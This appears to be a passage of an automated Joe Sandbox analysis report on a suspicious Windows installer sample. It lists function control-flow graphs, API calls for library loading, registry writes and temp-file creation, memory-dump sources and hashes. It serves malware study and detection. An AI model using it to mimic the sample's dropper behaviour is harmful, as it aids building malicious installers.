                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                                                    • String ID: 9
                                                                                                                                                                                                                    • API String ID: 163830602-2366072709
                                                                                                                                                                                                                    • Opcode ID: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
                                                                                                                                                                                                                    • Instruction ID: 0a1b8613d15e357d59cabb4a84863d73d9dad353ca9b6e0785da3ca47288b3a0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42511974D00219AEDF219F95DA88AAEB779FF04304F10443BE901B72D0DBB89982CB18
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00406624 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 1022 406624-406644 GetSystemDirectoryW 1023 406646 1022->1023 1024 406648-40664a 1022->1024 1023->1024 1025 40665b-40665d 1024->1025 1026 40664c-406655 1024->1026 1028 40665e-406691 wsprintfW LoadLibraryExW 1025->1028 1026->1025 1027 406657-406659 1026->1027 1027->1028
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00406676
                                                                                                                                                                                                                    • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040668A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                    • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                                    • API String ID: 2200240437-1946221925
                                                                                                                                                                                                                    • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                                                                                                    • Instruction ID: 9fa172bba6ca99a644905d2b6d7ed641771312ed853c50fe9922007c80c3d461
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7CF0FC70501119A6CF10BB64DD0EF9B365CA700304F10447AA54AF10D1EBB9DB64CB99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004057F1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 1029 4057f1-40583c CreateDirectoryW 1030 405842-40584f GetLastError 1029->1030 1031 40583e-405840 1029->1031 1032 405869-40586b 1030->1032 1033 405851-405865 SetFileSecurityW 1030->1033 1031->1032 1033->1031 1034 405867 GetLastError 1033->1034 1034->1032
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00405848
                                                                                                                                                                                                                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040585D
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00405867
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                    • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                    • API String ID: 3449924974-3370423016
                                                                                                                                                                                                                    • Opcode ID: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                                                                                                                                                                                    • Instruction ID: d156970015101e62572267df52bf1fb018b172c5ebb67f048bc3511340661aba
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB010872D00219EADF009FA1C944BEFBBB8EF14304F00803AE945B6280D7789618CFA9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00405DDF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 1035 405ddf-405deb 1036 405dec-405e20 GetTickCount GetTempFileNameW 1035->1036 1037 405e22-405e24 1036->1037 1038 405e2f-405e31 1036->1038 1037->1036 1039 405e26 1037->1039 1040 405e29-405e2c 1038->1040 1039->1040
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00405DFD
                                                                                                                                                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe",0040338D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,77573420,004035D9), ref: 00405E18
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • "C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe", xrefs: 00405DDF
                                                                                                                                                                                                                    • nsa, xrefs: 00405DEC
                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DE4, 00405DE8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                                                                                                                    • String ID: "C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                                    • API String ID: 1716503409-1190130691
                                                                                                                                                                                                                    • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                                                                                                    • Instruction ID: af8b6ba947558e1b0daa3aed001b6e0f80e178ffca66ecedc63f3e0829e9a41e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61F03076A00304FBEB009F69ED05E9FB7BCEB95710F10803AE941E7250E6B09A548B64
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 6F261777 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 1041 6f261777-6f2617b6 call 6f261b5f 1045 6f2618d6-6f2618d8 1041->1045 1046 6f2617bc-6f2617c0 1041->1046 1047 6f2617c2-6f2617c8 call 6f262352 1046->1047 1048 6f2617c9-6f2617d6 call 6f262394 1046->1048 1047->1048 1053 6f261806-6f26180d 1048->1053 1054 6f2617d8-6f2617dd 1048->1054 1055 6f26180f-6f26182b call 6f262569 call 6f2615b4 call 6f261272 GlobalFree 1053->1055 1056 6f26182d-6f261831 1053->1056 1057 6f2617df-6f2617e0 1054->1057 1058 6f2617f8-6f2617fb 1054->1058 1082 6f261885-6f261889 1055->1082 1059 6f261833-6f26187c call 6f2615c6 call 6f262569 1056->1059 1060 6f26187e-6f261884 call 6f262569 1056->1060 1063 6f2617e2-6f2617e3 1057->1063 1064 6f2617e8-6f2617e9 call 6f262aac 1057->1064 1058->1053 1061 6f2617fd-6f2617fe call 6f262d37 1058->1061 1059->1082 1060->1082 1075 6f261803 1061->1075 1070 6f2617e5-6f2617e6 1063->1070 1071 6f2617f0-6f2617f6 call 6f262724 1063->1071 1072 6f2617ee 1064->1072 1070->1053 1070->1064 1081 6f261805 1071->1081 1072->1075 1075->1081 1081->1053 1085 6f2618c6-6f2618cd 1082->1085 1086 6f26188b-6f261899 call 6f26252c 1082->1086 1085->1045 1088 6f2618cf-6f2618d0 GlobalFree 1085->1088 1091 6f2618b1-6f2618b8 1086->1091 1092 6f26189b-6f26189e 1086->1092 1088->1045 1091->1085 1094 6f2618ba-6f2618c5 call 6f26153d 1091->1094 1092->1091 1093 6f2618a0-6f2618a8 1092->1093 1093->1091 1095 6f2618aa-6f2618ab FreeLibrary 1093->1095 1094->1085 1095->1091
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F261B5F: GlobalFree.KERNEL32(?), ref: 6F261DB2
                                                                                                                                                                                                                      • Part of subcall function 6F261B5F: GlobalFree.KERNEL32(?), ref: 6F261DB7
                                                                                                                                                                                                                      • Part of subcall function 6F261B5F: GlobalFree.KERNEL32(?), ref: 6F261DBC
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6F261825
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 6F2618AB
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6F2618D0
                                                                                                                                                                                                                      • Part of subcall function 6F262352: GlobalAlloc.KERNEL32(00000040,?), ref: 6F262383
                                                                                                                                                                                                                      • Part of subcall function 6F262724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6F2617F6,00000000), ref: 6F2627F4
                                                                                                                                                                                                                      • Part of subcall function 6F2615C6: wsprintfW.USER32 ref: 6F2615F4
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49589958063.000000006F261000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F260000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49589926339.000000006F260000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49589985935.000000006F264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49590017734.000000006F266000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_6f260000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3962662361-3916222277
                                                                                                                                                                                                                    • Opcode ID: e51a39ba9ebe644e1251ce4111efe9902389760dc23605d10324e61ccfc13c61
                                                                                                                                                                                                                    • Instruction ID: ea1b800076a0d061ab580246863b022078bead785b84868c0a7ad9c85ce0171a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e51a39ba9ebe644e1251ce4111efe9902389760dc23605d10324e61ccfc13c61
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6941B1B140034EABEF149F749884BD637A8BF05B16F148166E9559E5C6DBB8F0C4CFA0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00402032 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73libraryCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 1098 402032-40203e 1099 402044-40205a call 402c41 * 2 1098->1099 1100 4020fd-4020ff 1098->1100 1110 40206a-402079 LoadLibraryExW 1099->1110 1111 40205c-402068 GetModuleHandleW 1099->1111 1101 40224b-402250 call 401423 1100->1101 1107 402ac5-402ad4 1101->1107 1108 40288b-402892 1101->1108 1108->1107 1113 40207b-40208a call 406703 1110->1113 1114 4020f6-4020f8 1110->1114 1111->1110 1111->1113 1118 4020c5-4020ca call 405322 1113->1118 1119 40208c-402092 1113->1119 1114->1101 1123 4020cf-4020d2 1118->1123 1121 402094-4020a0 call 401423 1119->1121 1122 4020ab-4020be call 6f261777 1119->1122 1121->1123 1132 4020a2-4020a9 1121->1132 1127 4020c0-4020c3 1122->1127 1123->1107 1125 4020d8-4020e2 call 40394a 1123->1125 1125->1107 1131 4020e8-4020f1 FreeLibrary 1125->1131 1127->1123 1131->1107 1132->1123
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                                                                                                                                                                                      • Part of subcall function 00405322: lstrlenW.KERNEL32(0042C228,00000000,0041DA00,775723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                                                                                      • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041DA00,775723A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                                                                                                      • Part of subcall function 00405322: lstrcatW.KERNEL32(0042C228,0040327A), ref: 0040537D
                                                                                                                                                                                                                      • Part of subcall function 00405322: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                                                                                                                                                                                                      • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                                                                                      • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                                                                                      • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                                                                                    • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                                                    • String ID: x(y
                                                                                                                                                                                                                    • API String ID: 334405425-3509028808
                                                                                                                                                                                                                    • Opcode ID: feecde648e4e86c349c2181d42606f42c320c3d08ea0eac6231e50817e8518ef
                                                                                                                                                                                                                    • Instruction ID: 732860e23109d101385e559ec06a1cde6071cd761d8e517fa4c79c7f2b675a05
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: feecde648e4e86c349c2181d42606f42c320c3d08ea0eac6231e50817e8518ef
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4421B031D00205EACF20AFA5CE48A9E7A70BF04358F64413BF511B51E0DBBD8981DA6E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsk21A3.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                                                                                                                                                    • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsk21A3.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsk21A3.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseValuelstrlen
                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsk21A3.tmp
                                                                                                                                                                                                                    • API String ID: 2655323295-1334823647
                                                                                                                                                                                                                    • Opcode ID: 9f44fae4feaf80abe13c7d1901b8792fbf05e0e188fbec8c03c8727959a673d1
                                                                                                                                                                                                                    • Instruction ID: 076fdad28fc4eb621c0ae83062707e46e05f76c541c0890e85279b1380dde0ba
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f44fae4feaf80abe13c7d1901b8792fbf05e0e188fbec8c03c8727959a673d1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1118471D00108BEEB10AFA5DE89EAEBA74EB44754F15803BF504F71D1DBB48D409B28
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00401B77 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 72memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00792878), ref: 00401BE7
                                                                                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF9
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
